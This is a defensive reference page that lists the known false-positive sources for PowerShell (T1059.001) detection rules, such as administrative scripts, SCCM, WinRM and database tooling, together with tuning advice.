LoFP LoFP / t1059.001

t1059.001

TitleTags
administrative activity
administrative script libraries
administrative scripts that use the same keywords.
administrator script
administrator scripts
administrators may attempt to change the default execution policy on a system for a variety of reasons. however, setting the policy to \"unrestricted\" or \"bypass\" as this search is designed to identify, would be unusual. hits should be reviewed and investigated as appropriate.
administrators or power users may use this command.
administrators or power users may use this powershell commandlet for troubleshooting.
amazon ssm document worker
appvclient
benign administrative tasks can also trigger alerts, necessitating a firm understanding of the typical system behavior and precise tuning of the analytic to reduce false positives.
ccm
citrix configsync.ps1
database administrators and developers frequently use invoke-sqlcmd as a legitimate tool for various database management tasks. this includes running automated database maintenance scripts, performing etl (extract, transform, load) processes, executing data migration jobs, implementing database deployment and configuration scripts, and running monitoring and reporting tasks. to effectively manage false positives in your environment, consider implementing several mitigation strategies. first, establish a whitelist of known administrator and service accounts that regularly perform these operations. second, create exceptions for approved script paths where legitimate database operations typically occur. additionally, it's important to baseline your environment's normal powershell database interaction patterns and implement monitoring for any deviations from these established patterns. finally, consider adjusting the risk score thresholds based on your specific environment and security requirements to achieve an optimal balance between security and operational efficiency.
depending on the scripts, this rule might require some initial tuning to fit the environment
direct ps command execution through sqlps.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action.
direct ps command execution through sqltoolsps.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.
false positives may be present and filtering will need to occur by parent process or command line argument. it may be required to modify this query to an edr product for more granular coverage.
false positives may be present based on legacy applications or utilities. win32_scheduledjob uses the remote procedure call (rpc) protocol to create scheduled tasks on remote computers. it uses the dcom (distributed component object model) infrastructure to establish a connection with the remote computer and invoke the necessary methods. the rpc service needs to be running on both the local and remote computers for the communication to take place.
false positives may be present when an administrator utilizes the cmdlets in the query. filter or monitor as needed.
false positives may be present. tune as needed.
false positives may occur if there are legitimate administrative commands being executed on the crushftp server that match the suspicious patterns. review the commands being executed to determine if the activity is legitimate administrative work or potential malicious activity.
false positives may only pertain to it not being related to empire, but another framework. filter as needed if any applications use the same pattern.
false positives should be limited as day to day scripts do not use this method.
false positives should be limited as the commands being identifies are quite specific to eventcode 4104 and mimikatz. filter as needed.
false positives should be limited. filter as needed.
false positives should be very limited as this is strict to metasploit behavior.
false positives should be very unlikely.
false positives will be present if any scripts are adding to inprocserver32. filter as needed.
high
in rare administrative cases, this function might be used to check network connectivity
it is possible administrators or scripts may run these commands, filtering may be required.
it is possible that legitimate scripts or network administrators may enable powershell web access. monitor and escalate as needed.
it is possible there will be false positives, filter as needed.
legitimate administrative script
legitimate applications may spawn powershell as a child process of the the identified processes. filter as needed.
legitimate certificate exports by administrators. additional filters might be required.
legitimate commands in .lnk files
legitimate powershell commands that use hidden windows for automation tasks may trigger this detection. the search specifically looks for patterns typical of fakecaptcha campaigns. you may need to add additional exclusions for legitimate administrative activities in your environment by modifying the filter macro.
legitimate powershell web access installations by administrators
legitimate process can have this combination of command-line options, but it's not common.
legitimate scripts that use iex
legitimate usage of dsinternals for administration or audit purpose.
legitimate usage of remote powershell, e.g. for monitoring purposes.
legitimate usage of remote powershell, e.g. remote administration and monitoring.
legitimate use of pester for writing tests for powershell scripts and modules
legitimate use of remote powershell execution
legitimate use of ssh proxycommand with scripting engines may trigger this detection. filter as needed based on your environment's normal ssh usage patterns and authorized scripting activities.
legitimate use remote powershell sessions
legitimate use to pass password to different powershell commands
likely
likely. many admin scripts and tools leverage powershell in their bat or vb scripts which may trigger this rule often. it is best to add additional filters or use this to hunt for anomalies
limited false positives may be present. filter as needed based on initial analysis.
limited false positives. filter as needed.
limited false positives. may filter as needed.
microsoft operations manager (mom)
microsoft sccm
moderate-to-low; despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments.
msp detection searcher
need tuning applocker or add exceptions in siem
network administrator may used this command for checking purposes
network operrator may use this command.
network service user name of a not-covered localization
note that false positives may occur due to the use of the enable-psremoting cmdlet by legitimate users, such as system administrators. it is recommended to apply appropriate filters as needed to minimize the number of false positives.
other programs that use these command line option and accepts an 'all' parameter
other scripts
other tools that incidentally use the same command line parameters
other tools that work with encoded scripts in the command line instead of script files
potential for some third party applications to disable amsi upon invocation. filter as needed.
powershell developer may used this function in their script for instance checking too.
powershell may used this function to process compressed data.
powershell may used this function to store out object into memory.
powershell scripts running as system user
powershell scripts that download content from the internet
programs using powershell directly without invocation of a dedicated interpreter
scripts or tools that download files
software installers that pull packages from remote systems and execute them
some false positives may arise in some environment and this may require some tuning. add additional filters or reduce level depending on the level of noise
some legitimate applications or administrative scripts may use these services for ip validation or geolocation. filter as needed for approved administrative tools.
some legitimate services or custom applications may use non-standard ports for development, remote management, or internal communication. ephemeral ports in test environments may occasionally overlap with ports used in this detection. additional context such as process name, user behavior, or endpoint telemetry should be used to validate suspicious sessions before escalation.
some legitimate user actions may trigger explorer.exe to spawn powershell or cmd.exe, such as right-clicking and selecting \"open powershell window here\" or similar options. filter as needed based on your environment's normal behavior patterns.
there may be legitimate reasons to bypass the powershell execution policy. the powershell script being run with this parameter should be validated to ensure that it is legitimate.
these characters might be legitimately on the command-line, but it is not common.
this behavior may be noisy, as these cmdlets are commonly used by system administrators or other legitimate users to manage services. therefore, it is recommended not to enable this analytic as a direct finding instead, it should be used as part of a broader set of security controls to detect and investigate potential threats.
this is meant to be a low risk rba anomaly analytic or to be used for hunting. enable this with a low risk score and let it generate risk in the risk index.
unlikely
use of get-command and get-help modules to reference invoke-webrequest and start-bitstransfer.
used by microsoft sql server management studio
used by some .net binaries, minimal on user workstation.
valid changes to the startup script
very special / sneaky powershell scripts
windows defender atp
winrm